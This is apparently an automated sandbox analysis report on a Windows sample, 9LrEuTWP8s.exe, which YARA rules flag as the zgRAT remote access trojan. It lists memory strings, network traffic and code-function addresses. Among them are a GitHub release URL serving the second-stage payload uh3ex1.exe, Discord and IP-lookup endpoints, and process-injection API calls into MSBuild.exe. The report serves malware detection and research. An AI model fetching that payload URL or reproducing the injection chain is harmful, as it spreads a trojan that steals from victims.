                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faulth
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.0000000003331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1473468111.0000000004751000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: powershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field1
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field1Response
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field1ResponseD
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field2
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field2Response
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field2ResponseD
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field3
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.00000000030B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field3Response
                      Source: MSBuild.exe, 00000008.00000002.1650116521.00000000030B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field3ResponseD
                      Source: powershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: MSBuild.exe, 00000008.00000002.1650116521.00000000030B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                      Source: powershell.exe, 00000003.00000002.1473468111.0000000004751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: powershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.000000000339B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                      Source: powershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: 9LrEuTWP8s.exeString found in binary or memory: https://github.com/Xavieprowel/crispy-palm-tree/releases/download/1/uh3ex1.exe
                      Source: powershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/882783246/b23a0dba-ce39
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.9:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49708 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 8.2.MSBuild.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 6.2.uh3ex1.exe.6d5ab000.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 6.2.uh3ex1.exe.6d590000.3.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
                      .NET source code contains very large array initializations
                      Source: uh3ex1.exe.1.dr, -Module-.csLarge array initialization: _206D_200E_206C_200E_206F_202E_202C_206C_202D_206C_206D_200D_206E_206E_202C_202A_202D_202E_206F_202D_200F_200E_200C_200D_202B_200F_206E_202C_200B_200F_206C_206E_202A_202A_200C_206A_202B_202C_202A_200D_202E: array initializer size 54016
                      Source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, Strings.csLarge array initialization: Strings: array initializer size 6160
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D593C10 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,NtGetContextThread,NtWriteVirtualMemory,NtCreateThreadEx,CloseHandle,CloseHandle,6_2_6D593C10
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D5936D0 GetModuleHandleW,NtQueryInformationProcess,6_2_6D5936D0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_046BB4903_2_046BB490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_046BB4703_2_046BB470
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08743A983_2_08743A98
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D593C106_2_6D593C10
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D5913606_2_6D591360
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D5936D06_2_6D5936D0
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D596C406_2_6D596C40
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D5910006_2_6D591000
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D592C306_2_6D592C30
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D5A26B56_2_6D5A26B5
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC58A06_2_00FC58A0
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC14786_2_00FC1478
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC39F06_2_00FC39F0
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC51706_2_00FC5170
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC5BF86_2_00FC5BF8
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC23E06_2_00FC23E0
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC0FC86_2_00FC0FC8
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC3BB36_2_00FC3BB3
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC34FF6_2_00FC34FF
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC3CFA6_2_00FC3CFA
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC2CE06_2_00FC2CE0
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC3C786_2_00FC3C78
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC404F6_2_00FC404F
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC3C1D6_2_00FC3C1D
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC38186_2_00FC3818
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC54176_2_00FC5417
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC44086_2_00FC4408
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC38086_2_00FC3808
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC4DD96_2_00FC4DD9
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC3D796_2_00FC3D79
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC3D436_2_00FC3D43
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC41386_2_00FC4138
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC31106_2_00FC3110
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC3EB96_2_00FC3EB9
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC3E7E6_2_00FC3E7E
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC2A606_2_00FC2A60
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC3E556_2_00FC3E55
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC3E0A6_2_00FC3E0A
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC43F86_2_00FC43F8
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC23DF6_2_00FC23DF
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC0FC76_2_00FC0FC7
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC3F836_2_00FC3F83
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC3F076_2_00FC3F07
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_015376608_2_01537660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_015308788_2_01530878
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_015308698_2_01530869
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_015376608_2_01537660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_054E64208_2_054E6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_054E10208_2_054E1020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_054E36408_2_054E3640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_054E363E8_2_054E363E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_054E00018_2_054E0001
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_054E63E68_2_054E63E6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_054E39888_2_054E3988
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_054E39868_2_054E3986
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_054E2BD98_2_054E2BD9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_054E2BF88_2_054E2BF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0709D0788_2_0709D078
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0709F9A08_2_0709F9A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0711F7388_2_0711F738
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0711D5E88_2_0711D5E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0711EC208_2_0711EC20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07118B988_2_07118B98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0711B8E88_2_0711B8E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07111FF08_2_07111FF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071120008_2_07112000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071100078_2_07110007
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071100408_2_07110040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071B1E288_2_071B1E28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071B42408_2_071B4240
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071B3AD08_2_071B3AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071C95908_2_071C9590
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071C35F08_2_071C35F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071C54B08_2_071C54B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071C64A08_2_071C64A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071CD2308_2_071CD230
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071C71D08_2_071C71D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071CDDA08_2_071CDDA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071CDDF88_2_071CDDF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071CE6088_2_071CE608
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071CE5F88_2_071CE5F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071C64908_2_071C6490
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071C54A18_2_071C54A1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071C71C08_2_071C71C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_071CDDE88_2_071CDDE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072736598_2_07273659
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0727B5B88_2_0727B5B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072771488_2_07277148
